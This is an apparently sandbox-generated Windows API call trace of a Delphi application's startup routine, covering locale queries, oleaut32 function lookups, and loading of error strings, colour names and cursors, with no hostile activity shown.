[0160.494] LoadStringA (in: hInstance=0x28f0000, uID=0xffe5, lpBuffer=0x14f1f8, cchBufferMax=1024 | out: lpBuffer="Invalid class typecast") returned 0x16
[0160.494] LoadStringA (in: hInstance=0x28f0000, uID=0xffe3, lpBuffer=0x14f1f8, cchBufferMax=1024 | out: lpBuffer="Floating point underflow") returned 0x18
[0160.494] LoadStringA (in: hInstance=0x28f0000, uID=0xffe2, lpBuffer=0x14f1f8, cchBufferMax=1024 | out: lpBuffer="Floating point overflow") returned 0x17
[0160.494] LoadStringA (in: hInstance=0x28f0000, uID=0xffe1, lpBuffer=0x14f1f8, cchBufferMax=1024 | out: lpBuffer="Floating point division by zero") returned 0x1f
[0160.494] LoadStringA (in: hInstance=0x28f0000, uID=0xffe0, lpBuffer=0x14f1f8, cchBufferMax=1024 | out: lpBuffer="Invalid floating point operation") returned 0x20
[0160.494] LoadStringA (in: hInstance=0x28f0000, uID=0xffff, lpBuffer=0x14f1f8, cchBufferMax=1024 | out: lpBuffer="Integer overflow") returned 0x10
[0160.494] LoadStringA (in: hInstance=0x28f0000, uID=0xfffe, lpBuffer=0x14f1f8, cchBufferMax=1024 | out: lpBuffer="Range check error") returned 0x11
[0160.494] LoadStringA (in: hInstance=0x28f0000, uID=0xfffd, lpBuffer=0x14f1f8, cchBufferMax=1024 | out: lpBuffer="Division by zero") returned 0x10
[0160.494] LoadStringA (in: hInstance=0x28f0000, uID=0xfffc, lpBuffer=0x14f1f8, cchBufferMax=1024 | out: lpBuffer="Invalid numeric input") returned 0x15
[0160.494] LoadStringA (in: hInstance=0x28f0000, uID=0xfffb, lpBuffer=0x14f1f8, cchBufferMax=1024 | out: lpBuffer="Disk full") returned 0x9
[0160.494] LoadStringA (in: hInstance=0x28f0000, uID=0xfffa, lpBuffer=0x14f1f8, cchBufferMax=1024 | out: lpBuffer="Read beyond end of file") returned 0x17
[0160.494] LoadStringA (in: hInstance=0x28f0000, uID=0xfff9, lpBuffer=0x14f1f8, cchBufferMax=1024 | out: lpBuffer="File access denied") returned 0x12
[0160.494] LoadStringA (in: hInstance=0x28f0000, uID=0xfff8, lpBuffer=0x14f1f8, cchBufferMax=1024 | out: lpBuffer="Too many open files") returned 0x13
[0160.494] LoadStringA (in: hInstance=0x28f0000, uID=0xfff7, lpBuffer=0x14f1f8, cchBufferMax=1024 | out: lpBuffer="Invalid filename") returned 0x10
[0160.494] LoadStringA (in: hInstance=0x28f0000, uID=0xfff6, lpBuffer=0x14f1f8, cchBufferMax=1024 | out: lpBuffer="File not found") returned 0xe
[0160.494] LoadStringA (in: hInstance=0x28f0000, uID=0xfff4, lpBuffer=0x14f1e4, cchBufferMax=1024 | out: lpBuffer="Out of memory") returned 0xd
[0160.494] LoadStringA (in: hInstance=0x28f0000, uID=0xffe4, lpBuffer=0x14f1e4, cchBufferMax=1024 | out: lpBuffer="Invalid pointer operation") returned 0x19
[0160.494] GetVersionExA (in: lpVersionInformation=0x14f57c*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x28f0000, dwMinorVersion=0x0, dwBuildNumber=0x28, dwPlatformId=0x65636341, szCSDVersion="ssibleObjectFromr<\x8f\x02·\"\x8f\x02\x14ö\x14") | out: lpVersionInformation=0x14f57c*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0160.494] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0160.494] GetProcAddress (hModule=0x75370000, lpProcName="GetDiskFreeSpaceExA") returned 0x753ff46f
[0160.494] GetThreadLocale () returned 0x409
[0160.494] GetThreadLocale () returned 0x409
[0160.494] GetLocaleInfoA (in: Locale=0x409, LCType=0x44, lpLCData=0x14f454, cchData=256 | out: lpLCData="Jan") returned 4
[0160.494] GetLocaleInfoA (in: Locale=0x409, LCType=0x38, lpLCData=0x14f454, cchData=256 | out: lpLCData="January") returned 8
[0160.494] GetLocaleInfoA (in: Locale=0x409, LCType=0x45, lpLCData=0x14f454, cchData=256 | out: lpLCData="Feb") returned 4
[0160.495] GetLocaleInfoA (in: Locale=0x409, LCType=0x39, lpLCData=0x14f454, cchData=256 | out: lpLCData="February") returned 9
[0160.495] GetLocaleInfoA (in: Locale=0x409, LCType=0x46, lpLCData=0x14f454, cchData=256 | out: lpLCData="Mar") returned 4
[0160.495] GetLocaleInfoA (in: Locale=0x409, LCType=0x3a, lpLCData=0x14f454, cchData=256 | out: lpLCData="March") returned 6
[0160.495] GetLocaleInfoA (in: Locale=0x409, LCType=0x47, lpLCData=0x14f454, cchData=256 | out: lpLCData="Apr") returned 4
[0160.495] GetLocaleInfoA (in: Locale=0x409, LCType=0x3b, lpLCData=0x14f454, cchData=256 | out: lpLCData="April") returned 6
[0160.495] GetLocaleInfoA (in: Locale=0x409, LCType=0x48, lpLCData=0x14f454, cchData=256 | out: lpLCData="May") returned 4
[0160.495] GetLocaleInfoA (in: Locale=0x409, LCType=0x3c, lpLCData=0x14f454, cchData=256 | out: lpLCData="May") returned 4
[0160.495] GetLocaleInfoA (in: Locale=0x409, LCType=0x49, lpLCData=0x14f454, cchData=256 | out: lpLCData="Jun") returned 4
[0160.495] GetLocaleInfoA (in: Locale=0x409, LCType=0x3d, lpLCData=0x14f454, cchData=256 | out: lpLCData="June") returned 5
[0160.495] GetLocaleInfoA (in: Locale=0x409, LCType=0x4a, lpLCData=0x14f454, cchData=256 | out: lpLCData="Jul") returned 4
[0160.495] GetLocaleInfoA (in: Locale=0x409, LCType=0x3e, lpLCData=0x14f454, cchData=256 | out: lpLCData="July") returned 5
[0160.495] GetLocaleInfoA (in: Locale=0x409, LCType=0x4b, lpLCData=0x14f454, cchData=256 | out: lpLCData="Aug") returned 4
[0160.495] GetLocaleInfoA (in: Locale=0x409, LCType=0x3f, lpLCData=0x14f454, cchData=256 | out: lpLCData="August") returned 7
[0160.495] GetLocaleInfoA (in: Locale=0x409, LCType=0x4c, lpLCData=0x14f454, cchData=256 | out: lpLCData="Sep") returned 4
[0160.495] GetLocaleInfoA (in: Locale=0x409, LCType=0x40, lpLCData=0x14f454, cchData=256 | out: lpLCData="September") returned 10
[0160.495] GetLocaleInfoA (in: Locale=0x409, LCType=0x4d, lpLCData=0x14f454, cchData=256 | out: lpLCData="Oct") returned 4
[0160.495] GetLocaleInfoA (in: Locale=0x409, LCType=0x41, lpLCData=0x14f454, cchData=256 | out: lpLCData="October") returned 8
[0160.495] GetLocaleInfoA (in: Locale=0x409, LCType=0x4e, lpLCData=0x14f454, cchData=256 | out: lpLCData="Nov") returned 4
[0160.495] GetLocaleInfoA (in: Locale=0x409, LCType=0x42, lpLCData=0x14f454, cchData=256 | out: lpLCData="November") returned 9
[0160.495] GetLocaleInfoA (in: Locale=0x409, LCType=0x4f, lpLCData=0x14f454, cchData=256 | out: lpLCData="Dec") returned 4
[0160.495] GetLocaleInfoA (in: Locale=0x409, LCType=0x43, lpLCData=0x14f454, cchData=256 | out: lpLCData="December") returned 9
[0160.495] GetLocaleInfoA (in: Locale=0x409, LCType=0x37, lpLCData=0x14f454, cchData=256 | out: lpLCData="Sun") returned 4
[0160.495] GetLocaleInfoA (in: Locale=0x409, LCType=0x30, lpLCData=0x14f454, cchData=256 | out: lpLCData="Sunday") returned 7
[0160.495] GetLocaleInfoA (in: Locale=0x409, LCType=0x31, lpLCData=0x14f454, cchData=256 | out: lpLCData="Mon") returned 4
[0160.495] GetLocaleInfoA (in: Locale=0x409, LCType=0x2a, lpLCData=0x14f454, cchData=256 | out: lpLCData="Monday") returned 7
[0160.495] GetLocaleInfoA (in: Locale=0x409, LCType=0x32, lpLCData=0x14f454, cchData=256 | out: lpLCData="Tue") returned 4
[0160.495] GetLocaleInfoA (in: Locale=0x409, LCType=0x2b, lpLCData=0x14f454, cchData=256 | out: lpLCData="Tuesday") returned 8
[0160.495] GetLocaleInfoA (in: Locale=0x409, LCType=0x33, lpLCData=0x14f454, cchData=256 | out: lpLCData="Wed") returned 4
[0160.495] GetLocaleInfoA (in: Locale=0x409, LCType=0x2c, lpLCData=0x14f454, cchData=256 | out: lpLCData="Wednesday") returned 10
[0160.495] GetLocaleInfoA (in: Locale=0x409, LCType=0x34, lpLCData=0x14f454, cchData=256 | out: lpLCData="Thu") returned 4
[0160.495] GetLocaleInfoA (in: Locale=0x409, LCType=0x2d, lpLCData=0x14f454, cchData=256 | out: lpLCData="Thursday") returned 9
[0160.495] GetLocaleInfoA (in: Locale=0x409, LCType=0x35, lpLCData=0x14f454, cchData=256 | out: lpLCData="Fri") returned 4
[0160.495] GetLocaleInfoA (in: Locale=0x409, LCType=0x2e, lpLCData=0x14f454, cchData=256 | out: lpLCData="Friday") returned 7
[0160.495] GetLocaleInfoA (in: Locale=0x409, LCType=0x36, lpLCData=0x14f454, cchData=256 | out: lpLCData="Sat") returned 4
[0160.495] GetLocaleInfoA (in: Locale=0x409, LCType=0x2f, lpLCData=0x14f454, cchData=256 | out: lpLCData="Saturday") returned 9
[0160.495] GetThreadLocale () returned 0x409
[0160.495] GetLocaleInfoA (in: Locale=0x409, LCType=0x14, lpLCData=0x14f4b0, cchData=256 | out: lpLCData="$") returned 2
[0160.495] GetLocaleInfoA (in: Locale=0x409, LCType=0x1b, lpLCData=0x14f4b0, cchData=256 | out: lpLCData="0") returned 2
[0160.495] GetLocaleInfoA (in: Locale=0x409, LCType=0x1c, lpLCData=0x14f4b0, cchData=256 | out: lpLCData="0") returned 2
[0160.495] GetLocaleInfoA (in: Locale=0x409, LCType=0xf, lpLCData=0x14f5a8, cchData=2 | out: lpLCData=",") returned 2
[0160.495] GetLocaleInfoA (in: Locale=0x409, LCType=0xe, lpLCData=0x14f5a8, cchData=2 | out: lpLCData=".") returned 2
[0160.496] GetLocaleInfoA (in: Locale=0x409, LCType=0x19, lpLCData=0x14f4b0, cchData=256 | out: lpLCData="2") returned 2
[0160.496] GetLocaleInfoA (in: Locale=0x409, LCType=0x1d, lpLCData=0x14f5a8, cchData=2 | out: lpLCData="/") returned 2
[0160.496] GetLocaleInfoA (in: Locale=0x409, LCType=0x1f, lpLCData=0x14f4b0, cchData=256 | out: lpLCData="M/d/yyyy") returned 9
[0160.496] GetThreadLocale () returned 0x409
[0160.496] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x14f47c, cchData=256 | out: lpLCData="1") returned 2
[0160.496] GetLocaleInfoA (in: Locale=0x409, LCType=0x20, lpLCData=0x14f4b0, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20
[0160.496] GetThreadLocale () returned 0x409
[0160.496] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x14f47c, cchData=256 | out: lpLCData="1") returned 2
[0160.496] GetLocaleInfoA (in: Locale=0x409, LCType=0x1e, lpLCData=0x14f5a8, cchData=2 | out: lpLCData=":") returned 2
[0160.496] GetLocaleInfoA (in: Locale=0x409, LCType=0x28, lpLCData=0x14f4b0, cchData=256 | out: lpLCData="AM") returned 3
[0160.496] GetLocaleInfoA (in: Locale=0x409, LCType=0x29, lpLCData=0x14f4b0, cchData=256 | out: lpLCData="PM") returned 3
[0160.496] GetLocaleInfoA (in: Locale=0x409, LCType=0x25, lpLCData=0x14f4b0, cchData=256 | out: lpLCData="0") returned 2
[0160.496] GetLocaleInfoA (in: Locale=0x409, LCType=0x23, lpLCData=0x14f4b0, cchData=256 | out: lpLCData="0") returned 2
[0160.496] GetLocaleInfoA (in: Locale=0x409, LCType=0x1005, lpLCData=0x14f4b0, cchData=256 | out: lpLCData="0") returned 2
[0160.496] GetLocaleInfoA (in: Locale=0x409, LCType=0xc, lpLCData=0x14f5a8, cchData=2 | out: lpLCData=",") returned 2
[0160.496] GetModuleHandleA (lpModuleName="oleaut32.dll") returned 0x758f0000
[0160.496] GetProcAddress (hModule=0x758f0000, lpProcName="VariantChangeTypeEx") returned 0x758f4c28
[0160.496] GetProcAddress (hModule=0x758f0000, lpProcName="VarNeg") returned 0x7596c802
[0160.496] GetProcAddress (hModule=0x758f0000, lpProcName="VarNot") returned 0x7596ec66
[0160.496] GetProcAddress (hModule=0x758f0000, lpProcName="VarAdd") returned 0x75915934
[0160.496] GetProcAddress (hModule=0x758f0000, lpProcName="VarSub") returned 0x7596d332
[0160.496] GetProcAddress (hModule=0x758f0000, lpProcName="VarMul") returned 0x7596dbd4
[0160.497] GetProcAddress (hModule=0x758f0000, lpProcName="VarDiv") returned 0x7596e405
[0160.497] GetProcAddress (hModule=0x758f0000, lpProcName="VarIdiv") returned 0x7596f00a
[0160.497] GetProcAddress (hModule=0x758f0000, lpProcName="VarMod") returned 0x7596f15e
[0160.497] GetProcAddress (hModule=0x758f0000, lpProcName="VarAnd") returned 0x75915a98
[0160.497] GetProcAddress (hModule=0x758f0000, lpProcName="VarOr") returned 0x7596ecfa
[0160.497] GetProcAddress (hModule=0x758f0000, lpProcName="VarXor") returned 0x7596ee2e
[0160.497] GetProcAddress (hModule=0x758f0000, lpProcName="VarCmp") returned 0x7590b0dc
[0160.497] GetProcAddress (hModule=0x758f0000, lpProcName="VarI4FromStr") returned 0x75906fab
[0160.497] GetProcAddress (hModule=0x758f0000, lpProcName="VarR4FromStr") returned 0x759101a0
[0160.497] GetProcAddress (hModule=0x758f0000, lpProcName="VarR8FromStr") returned 0x7590699e
[0160.497] GetProcAddress (hModule=0x758f0000, lpProcName="VarDateFromStr") returned 0x75916ba7
[0160.497] GetProcAddress (hModule=0x758f0000, lpProcName="VarCyFromStr") returned 0x75936c12
[0160.497] GetProcAddress (hModule=0x758f0000, lpProcName="VarBoolFromStr") returned 0x7590dbd1
[0160.497] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromCy") returned 0x75917fdc
[0160.498] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromDate") returned 0x75907a2a
[0160.498] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromBool") returned 0x75910355
[0160.498] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="") returned 0xa8
[0160.498] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0xa0
[0160.498] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xac
[0160.498] GetModuleHandleA (lpModuleName="USER32.DLL") returned 0x757b0000
[0160.498] GetDC (hWnd=0x0) returned 0x480107e1
[0160.498] GetDeviceCaps (hdc=0x480107e1, index=90) returned 96
[0160.498] ReleaseDC (hWnd=0x0, hDC=0x480107e1) returned 1
[0160.498] GetDC (hWnd=0x0) returned 0x480107e1
[0160.498] GetDeviceCaps (hdc=0x480107e1, index=104) returned 0
[0160.498] ReleaseDC (hWnd=0x0, hDC=0x480107e1) returned 1
[0160.498] CreatePalette (plpal=0x14f20c) returned 0x4a08086a
[0160.498] GetStockObject (i=7) returned 0x1b00017
[0160.498] GetStockObject (i=5) returned 0x1900015
[0160.498] GetStockObject (i=13) returned 0x18a002e
[0160.498] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027
[0160.498] MulDiv (nNumber=8, nNumerator=96, nDenominator=72) returned 11
[0160.499] LoadStringA (in: hInstance=0x28f0000, uID=0xff3d, lpBuffer=0x14f208, cchBufferMax=1024 | out: lpBuffer="Alt+") returned 0x4
[0160.499] LoadStringA (in: hInstance=0x28f0000, uID=0xff3c, lpBuffer=0x14f208, cchBufferMax=1024 | out: lpBuffer="Ctrl+") returned 0x5
[0160.499] LoadStringA (in: hInstance=0x28f0000, uID=0xff3b, lpBuffer=0x14f208, cchBufferMax=1024 | out: lpBuffer="Shift+") returned 0x6
[0160.499] LoadStringA (in: hInstance=0x28f0000, uID=0xff3a, lpBuffer=0x14f208, cchBufferMax=1024 | out: lpBuffer="Del") returned 0x3
[0160.499] LoadStringA (in: hInstance=0x28f0000, uID=0xff39, lpBuffer=0x14f208, cchBufferMax=1024 | out: lpBuffer="Ins") returned 0x3
[0160.499] LoadStringA (in: hInstance=0x28f0000, uID=0xff38, lpBuffer=0x14f208, cchBufferMax=1024 | out: lpBuffer="Down") returned 0x4
[0160.499] LoadStringA (in: hInstance=0x28f0000, uID=0xff37, lpBuffer=0x14f208, cchBufferMax=1024 | out: lpBuffer="Right") returned 0x5
[0160.499] LoadStringA (in: hInstance=0x28f0000, uID=0xff36, lpBuffer=0x14f208, cchBufferMax=1024 | out: lpBuffer="Up") returned 0x2
[0160.499] LoadStringA (in: hInstance=0x28f0000, uID=0xff35, lpBuffer=0x14f208, cchBufferMax=1024 | out: lpBuffer="Left") returned 0x4
[0160.499] LoadStringA (in: hInstance=0x28f0000, uID=0xff34, lpBuffer=0x14f208, cchBufferMax=1024 | out: lpBuffer="Home") returned 0x4
[0160.499] LoadStringA (in: hInstance=0x28f0000, uID=0xff33, lpBuffer=0x14f208, cchBufferMax=1024 | out: lpBuffer="End") returned 0x3
[0160.499] LoadStringA (in: hInstance=0x28f0000, uID=0xff32, lpBuffer=0x14f208, cchBufferMax=1024 | out: lpBuffer="PgDn") returned 0x4
[0160.499] LoadStringA (in: hInstance=0x28f0000, uID=0xff31, lpBuffer=0x14f208, cchBufferMax=1024 | out: lpBuffer="PgUp") returned 0x4
[0160.499] LoadStringA (in: hInstance=0x28f0000, uID=0xff30, lpBuffer=0x14f208, cchBufferMax=1024 | out: lpBuffer="Space") returned 0x5
[0160.499] LoadStringA (in: hInstance=0x28f0000, uID=0xff4f, lpBuffer=0x14f208, cchBufferMax=1024 | out: lpBuffer="Enter") returned 0x5
[0160.499] LoadStringA (in: hInstance=0x28f0000, uID=0xff4e, lpBuffer=0x14f208, cchBufferMax=1024 | out: lpBuffer="Esc") returned 0x3
[0160.499] LoadStringA (in: hInstance=0x28f0000, uID=0xff4d, lpBuffer=0x14f208, cchBufferMax=1024 | out: lpBuffer="Tab") returned 0x3
[0160.499] LoadStringA (in: hInstance=0x28f0000, uID=0xff4c, lpBuffer=0x14f208, cchBufferMax=1024 | out: lpBuffer="BkSp") returned 0x4
[0160.499] RegisterClipboardFormatA (lpszFormat="commdlg_help") returned 0xc0eb
[0160.499] RegisterClipboardFormatA (lpszFormat="commdlg_FindReplace") returned 0xc0fc
[0160.499] GetCurrentThreadId () returned 0x6f8
[0160.499] GlobalAddAtomA (lpString="WndProcPtr028F0000000006F8") returned 0xc111
[0160.500] LoadStringA (in: hInstance=0x28f0000, uID=0xfefc, lpBuffer=0x14f208, cchBufferMax=1024 | out: lpBuffer="Window Text") returned 0xb
[0160.500] LoadStringA (in: hInstance=0x28f0000, uID=0xfefb, lpBuffer=0x14f208, cchBufferMax=1024 | out: lpBuffer="Window Frame") returned 0xc
[0160.500] LoadStringA (in: hInstance=0x28f0000, uID=0xfefa, lpBuffer=0x14f208, cchBufferMax=1024 | out: lpBuffer="Window Background") returned 0x11
[0160.500] LoadStringA (in: hInstance=0x28f0000, uID=0xfef9, lpBuffer=0x14f208, cchBufferMax=1024 | out: lpBuffer="3D Light") returned 0x8
[0160.500] LoadStringA (in: hInstance=0x28f0000, uID=0xfef8, lpBuffer=0x14f208, cchBufferMax=1024 | out: lpBuffer="3D Dark Shadow") returned 0xe
[0160.500] LoadStringA (in: hInstance=0x28f0000, uID=0xfef7, lpBuffer=0x14f208, cchBufferMax=1024 | out: lpBuffer="Scroll Bar") returned 0xa
[0160.500] LoadStringA (in: hInstance=0x28f0000, uID=0xfef6, lpBuffer=0x14f208, cchBufferMax=1024 | out: lpBuffer="None") returned 0x4
[0160.500] LoadStringA (in: hInstance=0x28f0000, uID=0xfef5, lpBuffer=0x14f208, cchBufferMax=1024 | out: lpBuffer="Menu Text") returned 0x9
[0160.500] LoadStringA (in: hInstance=0x28f0000, uID=0xfef4, lpBuffer=0x14f208, cchBufferMax=1024 | out: lpBuffer="Menu Background") returned 0xf
[0160.500] LoadStringA (in: hInstance=0x28f0000, uID=0xfef3, lpBuffer=0x14f208, cchBufferMax=1024 | out: lpBuffer="Info Text") returned 0x9
[0160.500] LoadStringA (in: hInstance=0x28f0000, uID=0xfef2, lpBuffer=0x14f208, cchBufferMax=1024 | out: lpBuffer="Info Background") returned 0xf
[0160.500] LoadStringA (in: hInstance=0x28f0000, uID=0xfef1, lpBuffer=0x14f208, cchBufferMax=1024 | out: lpBuffer="Inactive Caption Text") returned 0x15
[0160.500] LoadStringA (in: hInstance=0x28f0000, uID=0xfef0, lpBuffer=0x14f208, cchBufferMax=1024 | out: lpBuffer="Inactive Caption") returned 0x10
[0160.500] LoadStringA (in: hInstance=0x28f0000, uID=0xff0f, lpBuffer=0x14f208, cchBufferMax=1024 | out: lpBuffer="Inactive Border") returned 0xf
[0160.500] LoadStringA (in: hInstance=0x28f0000, uID=0xff0e, lpBuffer=0x14f208, cchBufferMax=1024 | out: lpBuffer="Highlight Text") returned 0xe
[0160.500] LoadStringA (in: hInstance=0x28f0000, uID=0xff0d, lpBuffer=0x14f208, cchBufferMax=1024 | out: lpBuffer="Highlight Background") returned 0x14
[0160.500] LoadStringA (in: hInstance=0x28f0000, uID=0xff0c, lpBuffer=0x14f208, cchBufferMax=1024 | out: lpBuffer="Gray Text") returned 0x9
[0160.500] LoadStringA (in: hInstance=0x28f0000, uID=0xff0b, lpBuffer=0x14f208, cchBufferMax=1024 | out: lpBuffer="Default") returned 0x7
[0160.500] LoadStringA (in: hInstance=0x28f0000, uID=0xff0a, lpBuffer=0x14f208, cchBufferMax=1024 | out: lpBuffer="Caption Text") returned 0xc
[0160.500] LoadStringA (in: hInstance=0x28f0000, uID=0xff09, lpBuffer=0x14f208, cchBufferMax=1024 | out: lpBuffer="Button Text") returned 0xb
[0160.500] LoadStringA (in: hInstance=0x28f0000, uID=0xff08, lpBuffer=0x14f208, cchBufferMax=1024 | out: lpBuffer="Button Shadow") returned 0xd
[0160.500] LoadStringA (in: hInstance=0x28f0000, uID=0xff07, lpBuffer=0x14f208, cchBufferMax=1024 | out: lpBuffer="Button Highlight") returned 0x10
[0160.500] LoadStringA (in: hInstance=0x28f0000, uID=0xff06, lpBuffer=0x14f208, cchBufferMax=1024 | out: lpBuffer="Button Face") returned 0xb
[0160.500] LoadStringA (in: hInstance=0x28f0000, uID=0xff05, lpBuffer=0x14f208, cchBufferMax=1024 | out: lpBuffer="Background") returned 0xa
[0160.500] LoadStringA (in: hInstance=0x28f0000, uID=0xff04, lpBuffer=0x14f208, cchBufferMax=1024 | out: lpBuffer="Application Workspace") returned 0x15
[0160.500] LoadStringA (in: hInstance=0x28f0000, uID=0xff03, lpBuffer=0x14f208, cchBufferMax=1024 | out: lpBuffer="Active Caption") returned 0xe
[0160.500] LoadStringA (in: hInstance=0x28f0000, uID=0xff02, lpBuffer=0x14f208, cchBufferMax=1024 | out: lpBuffer="Active Border") returned 0xd
[0160.500] LoadStringA (in: hInstance=0x28f0000, uID=0xff01, lpBuffer=0x14f208, cchBufferMax=1024 | out: lpBuffer="Medium Gray") returned 0xb
[0160.500] LoadStringA (in: hInstance=0x28f0000, uID=0xff00, lpBuffer=0x14f208, cchBufferMax=1024 | out: lpBuffer="Cream") returned 0x5
[0160.500] LoadStringA (in: hInstance=0x28f0000, uID=0xff1f, lpBuffer=0x14f208, cchBufferMax=1024 | out: lpBuffer="Sky Blue") returned 0x8
[0160.500] LoadStringA (in: hInstance=0x28f0000, uID=0xff1e, lpBuffer=0x14f208, cchBufferMax=1024 | out: lpBuffer="Money Green") returned 0xb
[0160.500] LoadStringA (in: hInstance=0x28f0000, uID=0xff1d, lpBuffer=0x14f208, cchBufferMax=1024 | out: lpBuffer="White") returned 0x5
[0160.501] LoadStringA (in: hInstance=0x28f0000, uID=0xff1c, lpBuffer=0x14f208, cchBufferMax=1024 | out: lpBuffer="Aqua") returned 0x4
[0160.501] LoadStringA (in: hInstance=0x28f0000, uID=0xff1b, lpBuffer=0x14f208, cchBufferMax=1024 | out: lpBuffer="Fuchsia") returned 0x7
[0160.501] LoadStringA (in: hInstance=0x28f0000, uID=0xff1a, lpBuffer=0x14f208, cchBufferMax=1024 | out: lpBuffer="Blue") returned 0x4
[0160.501] LoadStringA (in: hInstance=0x28f0000, uID=0xff19, lpBuffer=0x14f208, cchBufferMax=1024 | out: lpBuffer="Yellow") returned 0x6
[0160.501] LoadStringA (in: hInstance=0x28f0000, uID=0xff18, lpBuffer=0x14f208, cchBufferMax=1024 | out: lpBuffer="Lime") returned 0x4
[0160.501] LoadStringA (in: hInstance=0x28f0000, uID=0xff17, lpBuffer=0x14f208, cchBufferMax=1024 | out: lpBuffer="Red") returned 0x3
[0160.501] LoadStringA (in: hInstance=0x28f0000, uID=0xff16, lpBuffer=0x14f208, cchBufferMax=1024 | out: lpBuffer="Silver") returned 0x6
[0160.501] LoadStringA (in: hInstance=0x28f0000, uID=0xff15, lpBuffer=0x14f208, cchBufferMax=1024 | out: lpBuffer="Gray") returned 0x4
[0160.501] LoadStringA (in: hInstance=0x28f0000, uID=0xff14, lpBuffer=0x14f208, cchBufferMax=1024 | out: lpBuffer="Teal") returned 0x4
[0160.501] LoadStringA (in: hInstance=0x28f0000, uID=0xff13, lpBuffer=0x14f208, cchBufferMax=1024 | out: lpBuffer="Purple") returned 0x6
[0160.501] LoadStringA (in: hInstance=0x28f0000, uID=0xff12, lpBuffer=0x14f208, cchBufferMax=1024 | out: lpBuffer="Navy") returned 0x4
[0160.501] LoadStringA (in: hInstance=0x28f0000, uID=0xff11, lpBuffer=0x14f208, cchBufferMax=1024 | out: lpBuffer="Olive") returned 0x5
[0160.501] LoadStringA (in: hInstance=0x28f0000, uID=0xff10, lpBuffer=0x14f208, cchBufferMax=1024 | out: lpBuffer="Green") returned 0x5
[0160.501] LoadStringA (in: hInstance=0x28f0000, uID=0xff2f, lpBuffer=0x14f208, cchBufferMax=1024 | out: lpBuffer="Maroon") returned 0x6
[0160.501] LoadStringA (in: hInstance=0x28f0000, uID=0xff2e, lpBuffer=0x14f208, cchBufferMax=1024 | out: lpBuffer="Black") returned 0x5
[0160.501] RegisterClipboardFormatA (lpszFormat="Delphi Picture") returned 0xc157
[0160.501] RegisterClipboardFormatA (lpszFormat="Delphi Component") returned 0xc158
[0160.501] GetVersion () returned 0x1db10106
[0160.501] GetCurrentProcessId () returned 0x710
[0160.501] GlobalAddAtomA (lpString="Delphi00000710") returned 0xc116
[0160.501] GetCurrentThreadId () returned 0x6f8
[0160.501] GlobalAddAtomA (lpString="ControlOfs028F0000000006F8") returned 0xc110
[0160.501] RegisterClipboardFormatA (lpszFormat="ControlOfs028F0000000006F8") returned 0xc17d
[0160.501] GetProcAddress (hModule=0x757b0000, lpProcName="GetMonitorInfoA") returned 0x757bc34e
[0160.501] GetProcAddress (hModule=0x757b0000, lpProcName="GetSystemMetrics") returned 0x757c67cf
[0160.501] GetSystemMetrics (nIndex=19) returned 1
[0160.502] GetSystemMetrics (nIndex=75) returned 1
[0160.502] SystemParametersInfoA (in: uiAction=0x68, uiParam=0x0, pvParam=0x2a11320, fWinIni=0x0 | out: pvParam=0x2a11320) returned 1
[0160.502] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003
[0160.502] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015
[0160.502] LoadCursorA (hInstance=0x28f0000, lpCursorName=0x7ff9) returned 0x220139
[0160.502] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8b) returned 0x1001b
[0160.502] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8a) returned 0x10019
[0160.502] LoadCursorA (hInstance=0x0, lpCursorName=0x7f88) returned 0x10017
[0160.502] LoadCursorA (hInstance=0x28f0000, lpCursorName=0x7ffa) returned 0xd022d
[0160.502] LoadCursorA (hInstance=0x28f0000, lpCursorName=0x7ffb) returned 0xa0229
[0160.503] LoadCursorA (hInstance=0x28f0000, lpCursorName=0x7ffc) returned 0x9020d
[0160.503] LoadCursorA (hInstance=0x28f0000, lpCursorName=0x7ffd) returned 0xb0201
[0160.503] LoadCursorA (hInstance=0x28f0000, lpCursorName=0x7fff) returned 0xb01f3
[0160.503] LoadCursorA (hInstance=0x28f0000, lpCursorName=0x7ffe) returned 0xb01c5
[0160.503] LoadCursorA (hInstance=0x0, lpCursorName=0x7f02) returned 0x10007
[0160.503] LoadCursorA (hInstance=0x0, lpCursorName=0x7f04) returned 0x1000b
[0160.504] LoadCursorA (hInstance=0x0, lpCursorName=0x7f84) returned 0x10011
[0160.504] LoadCursorA (hInstance=0x0, lpCursorName=0x7f82) returned 0x1000d
[0160.504] LoadCursorA (hInstance=0x0, lpCursorName=0x7f85) returned 0x10013
[0160.504] LoadCursorA (hInstance=0x0, lpCursorName=0x7f83) returned 0x1000f
[0160.504] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015
[0160.504] LoadCursorA (hInstance=0x0, lpCursorName=0x7f01) returned 0x10005
[0160.504] LoadCursorA (hInstance=0x0, lpCursorName=0x7f03) returned 0x10009
[0160.504] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003
[0160.504] GetKeyboardLayout (idThread=0x0) returned 0x4090409
[0160.504] GetDC (hWnd=0x0) returned 0x480107e1
[0160.504] GetDeviceCaps (hdc=0x480107e1, index=90) returned 96
[0160.504] ReleaseDC (hWnd=0x0, hDC=0x480107e1) returned 1
[0160.504] GetProcAddress (hModule=0x757b0000, lpProcName="EnumDisplayMonitors") returned 0x757c34a3
[0160.504] EnumDisplayMonitors (hdc=0x0, lprcClip=0x0, lpfnEnum=0x2949a60, dwData=0x2a1156c) returned 1
